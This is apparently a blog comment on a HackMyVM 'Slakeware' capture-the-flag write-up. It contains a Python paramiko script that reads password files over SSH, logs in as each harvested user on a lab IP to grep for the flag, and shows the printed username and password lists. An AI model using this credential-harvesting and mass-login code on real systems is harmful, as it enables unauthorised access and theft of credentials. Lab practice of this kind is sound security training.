hgbe02
commented
2 months ago 这里写了一个遍历的脚本,有兴趣的可以尝试一下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/9/11 12:49
# @Author : hgbe02
# @File : slakeware_brute.py
import paramiko
usernames = []
passwords = []
def ssh_login_with_password(host, port, username, password):
# 创建一个新的 SSH 客户端对象
client = paramiko.SSHClient()
# 自动添加策略,用于保存服务器的主机名和密钥信息(自动保存)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
# 连接 SSH 服务端,这里使用了密码方式进行认证
client.connect(host, port=port, username=username, password=password)
# 执行命令获取用户名
stdin, stdout, stderr = client.exec_command(
"find ../ -name *pass* -type f 2>/dev/null | awk -F '[/]' '{print $2}'"
)
output = stdout.read().decode().splitlines()
# print("[+] Username\n", output)
global usernames
for line in output:
stripped_line = line.strip()
if stripped_line not in usernames:
usernames.append(stripped_line)
# 执行命令获取密码
stdin, stdout, stderr = client.exec_command(
"find ../ -name '*pass*' -type f 2>/dev/null | xargs cat"
)
output = stdout.read().decode().splitlines()
# print("[+] Password\n", output)
global passwords
for line in output:
stripped_line = line.strip()
if stripped_line not in passwords:
passwords.append(stripped_line)
except paramiko.AuthenticationException:
print("Authentication failed, please verify your credentials.")
except paramiko.SSHException as sshException:
print("Unable to establish SSH connection: " + str(sshException))
except Exception as e:
print("Exception in connecting to the server: " + str(e))
finally:
# 关闭连接
client.close()
ssh_login_with_password('192.168.10.100', 1, 'patrick', 'trYth1sPasS1993')
a = 0
while a < len(usernames):
ssh_login_with_password('192.168.10.100', 1, usernames[a], passwords[a])
a += 1
print('[+] username and password ! (✪ω✪)')
print(usernames)
print(passwords)
# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee',
# 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft',
# 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer',
# 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos',
# 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']
#
# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt',
# 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc',
# '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t',
# 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg',
# '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj',
# 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh',
# 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw',
# 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']
def execute_command(host, port, username, password, command):
# 创建 SSH 客户端
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
# 连接到SSH服务器
client.connect(host, port=port, username=username, password=password)
# 执行命令
stdin, stdout, stderr = client.exec_command(command)
# 获取命令结果
output = stdout.read().decode('utf-8').strip()
error = stderr.read().decode('utf-8').strip()
if output:
print(f"[+] USER:{username} PASS:{password} => {output}")
except Exception as e:
print(f"An error occurred: {str(e)}")
finally:
# 关闭连接
client.close()
print("[+] Search user flag (っ^_^)っ")
for i in range(0, len(usernames)):
execute_command('192.168.10.100', 1, usernames[i], passwords[i], "grep -Pnir 'hmv' ./")
# [+] username and password ! (✪ω✪)
# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee', 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft', 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer', 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos', 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']
# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt', 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc', '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t', 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg', '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj', 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh', 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw', 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']
# [+] Search user flag (っ^_^)っ
# [+] USER:rpj7 PASS:wP26CtkDby6J => ./user.txt:1:HMV{Th1s1s1Us3rFlag}
Slakeware | 北海听雨
slakeware
https://hgbe02.github.io//Hackmyvm/Slakeware.html